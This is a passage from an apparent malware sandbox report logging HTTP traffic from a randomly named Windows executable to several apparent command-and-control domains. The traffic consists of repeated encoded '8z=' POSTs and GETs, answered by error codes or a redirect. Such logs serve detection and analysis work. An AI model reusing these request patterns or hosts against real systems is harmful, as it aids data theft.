                                                                                          Vary: Access-Control-Request-Method
                                                                                          Vary: Access-Control-Request-Headers
                                                                                          Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                                          Access-Control-Allow-Credentials: true
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 6d 39 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 54{"msg":"/cm9a/","code":401}0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          23 | 192.168.2.5 | 49999 | 8.210.46.21 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:21:36.798192978 CET | 1763 | OUT | POST /cm9a/ HTTP/1.1
                                                                                          Host: www.prhmcjdz.tokyo
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.prhmcjdz.tokyo
                                                                                          Referer: http://www.prhmcjdz.tokyo/cm9a/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:21:38.359129906 CET | 508 | IN | HTTP/1.1 200
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:21:38 GMT
                                                                                          Content-Type: application/json;charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Origin
                                                                                          Vary: Access-Control-Request-Method
                                                                                          Vary: Access-Control-Request-Headers
                                                                                          Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                                          Access-Control-Allow-Credentials: true
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 6d 39 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 54{"msg":"/cm9a/","code":401}0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          24 | 192.168.2.5 | 50000 | 8.210.46.21 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:21:39.451864004 CET | 474 | OUT | GET /cm9a/?8z=AvN42DnS9Qw3kn1Ry3KvTJdIGYrzP5U8wu7Mj7dY/pRaa7659YJNcYiJunyE7nDkkRGZb81LCaJ1YXfnfuSvlhjap6ivTCbha0++M9x+FSojTXuY7LBG4JzCnBD9GjapUw==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.prhmcjdz.tokyo
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:21:41.020780087 CET | 427 | IN | HTTP/1.1 200
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:21:40 GMT
                                                                                          Content-Type: application/json;charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Origin
                                                                                          Vary: Access-Control-Request-Method
                                                                                          Vary: Access-Control-Request-Headers
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          X-Cache: MISS
                                                                                          Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 6d 39 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 54{"msg":"/cm9a/","code":401}0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          25 | 192.168.2.5 | 50001 | 203.161.43.228 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:21:46.395579100 CET | 723 | OUT | POST /6urf/ HTTP/1.1
                                                                                          Host: www.connecty.live
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.connecty.live
                                                                                          Referer: http://www.connecty.live/6urf/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=o8IUFI7bomKMG+ppM94r1nEqrBcUxyf6+lAh5q77VB57VQlICnJTcqR29hVU0QlOQdRN0DTyIyUHETwRvdjd1vIH9TRRd542in6KJ6KTaf1cv7X1I/eIguO3npy73Yxx04SAmR6FPEKvNMDAFFEOphKkjn83v5ynezmpjngX4QhMGNog4Cg03mCaGpIiyCrlNsRd7Bc=
                                                                                          Nov 24, 2024 08:21:47.613506079 CET | 658 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Sun, 24 Nov 2024 07:21:47 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 514
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          26 | 192.168.2.5 | 50002 | 203.161.43.228 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:21:49.065767050 CET | 743 | OUT | POST /6urf/ HTTP/1.1
                                                                                          Host: www.connecty.live
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.connecty.live
                                                                                          Referer: http://www.connecty.live/6urf/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=o8IUFI7bomKMHdxpKeQrkXEthhcU/Sf++lEh5vLrVUp7WxVIDi1TfqR22BVR6wlVQdc60BHyIywHEWMRsubS6fIF2zRpDJ42in6KJ6e1afdcsLn1JbKPjuO2gpy7zYx104TlmQmrPBGvNMTAEUER8xLOtH9BubHsHkGGhh1DuRhpKbZKigockGuiW6AVjyKMXPBtlWJoybfkmqYyZ6mSzhg+Q0Dk
                                                                                          Nov 24, 2024 08:21:50.380141020 CET | 658 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Sun, 24 Nov 2024 07:21:50 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 514
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          27 | 192.168.2.5 | 50003 | 203.161.43.228 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:21:51.743454933 CET | 1760 | OUT | POST /6urf/ HTTP/1.1
                                                                                          Host: www.connecty.live
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.connecty.live
                                                                                          Referer: http://www.connecty.live/6urf/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:21:53.076112986 CET | 658 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Sun, 24 Nov 2024 07:21:52 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 514
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          28 | 192.168.2.5 | 50004 | 203.161.43.228 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:21:54.410326958 CET | 473 | OUT | GET /6urf/?8z=l+g0G83zvX30P9FhHqUPiCMCp3kC0CiGmxU2wY32UHo7SRAzM3NVc5Nn4wkj2AVHW/hBkkPychobZjIg4/uR1+EuxlxxaYBW6k6qKLTJOsgiw7KKI/jspabCkJT8248+oQ==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.connecty.live
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:21:55.677627087 CET | 673 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Sun, 24 Nov 2024 07:21:55 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 514
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          29 | 192.168.2.5 | 50005 | 13.248.169.48 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:22:01.052650928 CET | 708 | OUT | POST /cpgr/ HTTP/1.1
                                                                                          Host: www.tals.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.tals.xyz
                                                                                          Referer: http://www.tals.xyz/cpgr/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=/Wn5zNWl0nSaoVrwWE0JsEri8BNPv7gHNp/wkeLrDVG0NJt6/ZELIisWzg5vRNGWOtuMkdy1Qcq9oLo8uFKZQQj1vnMmyWGERV1kRGP9PW+IPiV7MKvSR9C58EuHOiqud1PJtpQIeW/ctmbqxAqmIaMXK2Du4g1RWCwnVPb5ku49YBA3zS6gUzp71VPTRNNfIxagtlQ=


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          30 | 192.168.2.5 | 50006 | 13.248.169.48 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:22:03.747143030 CET | 728 | OUT | POST /cpgr/ HTTP/1.1
                                                                                          Host: www.tals.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.tals.xyz
                                                                                          Referer: http://www.tals.xyz/cpgr/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=/Wn5zNWl0nSanUbwRXMJqkrj5BNPkbgDNpzwkbv7Dmi0NsJ6w9oLJisW4A52ftGNOtiqkZ61QYC9oKY8tyeaCQjziHMktmGERV1kRGrbPWWIPSl7MrvdfdC61kuHKiqqd1POto8ueUHctkDqxRqnGaMdFWCD5DMBQjcAJMyL3YITQXxdpwyIHTFDlGHkA9s2SSKQzyFRTWKZsEE+qtJy5t/r4Ev2


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 50007 | 13.248.169.48 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:22:06.409101963 CET | 1745 | OUT | POST /cpgr/ HTTP/1.1
                                                                                          Host: www.tals.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.tals.xyz
                                                                                          Referer: http://www.tals.xyz/cpgr/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 50008 | 13.248.169.48 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:22:09.076402903 CET | 468 | OUT | GET /cpgr/?8z=yUPZw4O96lKRgUDiLQ4YjgWex0ZVjKNUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjKCb8tnAargGvaXZxb0CZL2/WUDIdN/ulbpy32VGDPj7SFQ==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.tals.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Nov 24, 2024 08:22:10.256428003 CET | 410 | IN | HTTP/1.1 200 OK
                                                                                          Server: openresty
                                                                                          Date: Sun, 24 Nov 2024 07:22:10 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 270
                                                                                          Connection: close
                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?8z=yUPZw4O96lKRgUDiLQ4YjgWex0ZVjKNUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjKCb8tnAargGvaXZxb0CZL2/WUDIdN/ulbpy32VGDPj7SFQ==&afwXa=6nnHQlkprRILE"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 50009 | 147.255.21.187 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:22:15.804099083 CET | 714 | OUT | POST /u9hy/ HTTP/1.1
                                                                                          Host: www.50food.com
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.50food.com
                                                                                          Referer: http://www.50food.com/u9hy/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=bo4LrJQp5WjRPmyPawi8PLuKBY1GmkY9xp+0chdd5hWTVgMcU/QYEJW2pIX4SMD+LEFn8yCGgjSHRZyh4pQZCLZlEBrtsAUgH2EruNZxoaRlLPwyHTjgw2/VybbjJHBewCoUdU32G/kQTQ7WSgf6gYOd3o2gSz4gtbPkLeS7lJ2DZJjTjb/WlFQ8TIqvGhae2Jm+Kvw=
Nov 24, 2024 08:22:17.015028000 CET | 309 | IN | HTTP/1.1 403 Forbidden
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:22:11 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 166
                                                                                          Connection: close
                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 50010 | 147.255.21.187 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:22:18.470232010 CET | 734 | OUT | POST /u9hy/ HTTP/1.1
                                                                                          Host: www.50food.com
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.50food.com
                                                                                          Referer: http://www.50food.com/u9hy/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=bo4LrJQp5WjRAmCPcX+8JruJEY1GtEZVxpy0cgYW5TiTVB8cGr8YBJW2noWwcsD5LEZV8z+GgjGHRamh44QeCbZnMhrrigUgH2EruNMaob1lK8YyGxLjsm/Szbbje3BawCo6dV7cG5gQTV/WTxf5uYOH5I3HUmNa3bDbD8Om8qScY/S5553+2l8EDbiYXR73sq2OU4lyQj0q9XhqJ5Q3kBCWDXdR
Nov 24, 2024 08:22:19.677481890 CET | 309 | IN | HTTP/1.1 403 Forbidden
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:22:14 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 166
                                                                                          Connection: close
                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 50011 | 147.255.21.187 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:22:21.132108927 CET | 1751 | OUT | POST /u9hy/ HTTP/1.1
                                                                                          Host: www.50food.com
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.50food.com
                                                                                          Referer: http://www.50food.com/u9hy/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Nov 24, 2024 08:22:22.387420893 CET | 309 | IN | HTTP/1.1 403 Forbidden
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:22:17 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 166
                                                                                          Connection: close
                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 50012 | 147.255.21.187 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:22:23.793912888 CET | 470 | OUT | GET /u9hy/?8z=WqQro+xdjTeJIlGzWne5GtaANfF9lgg49rKxVxpmjgGfbhgcY6AAEIO8u8GwbvTJPVNB3UOdkxCDRvWF6atxHJx7JVXWinhAO2sI58h2p8ITVN90H2WFsxLS9qnZGEsuzw==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.50food.com
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Nov 24, 2024 08:22:25.055861950 CET | 141 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:22:19 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 0
                                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 50013 | 172.67.159.61 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
Timestamp | Bytes transferred | Direction | Data
Nov 24, 2024 08:22:30.356466055 CET | 738 | OUT | POST /f8c6/ HTTP/1.1
                                                                                          Host: www.zriaraem-skiry.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.zriaraem-skiry.sbs
                                                                                          Referer: http://www.zriaraem-skiry.sbs/f8c6/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=nbjRd4jDDoGnShAK7ZL6V8b840uly6gWRWodyeqTLCj1DtczpuEQh7rFnbzTELeLftP7TgAHVG+dgUq9LBmm4hDu4v0jgrjZRN//FFGHUt5F38oD8w5RbHyKUzEYFl9oE/I+rD4p2TNmZtoZj21SUTEaYxHbsYwP9mL2VR5D1DxLy+WDl/kDETLdyAhX15wsoiUNOdk=
Nov 24, 2024 08:22:31.632987022 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Sun, 24 Nov 2024 07:22:31 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Last-Modified: Thu, 29 Aug 2024 10:57:57 GMT
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bt%2FC5g%2BuGtiOfW3NoAmUKTGD%2FGXnYmr8EN7hAqypXDHX2JqtePdyuaDrMkj0V1nMONioeE1h176%2B0V5B87UWTyRS5IpHWtDJwrxN3SWYcumNbHF8f0syOch4g776B30TS%2Fqnv7PJFsti"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e77a5f97cfe421b-EWR
                                                                                          Content-Encoding: gzip
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1708&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=738&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Nov 24, 2024 08:22:31.633028030 CET | 344 | IN | [gzip-compressed response body continues; raw bytes omitted]


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          38 | 192.168.2.5 | 50014 | 172.67.159.61 | 80 | 2020 | C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:22:33.022430897 CET | 758 | OUT | POST /f8c6/ HTTP/1.1
                                                                                          Host: www.zriaraem-skiry.sbs
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.zriaraem-skiry.sbs
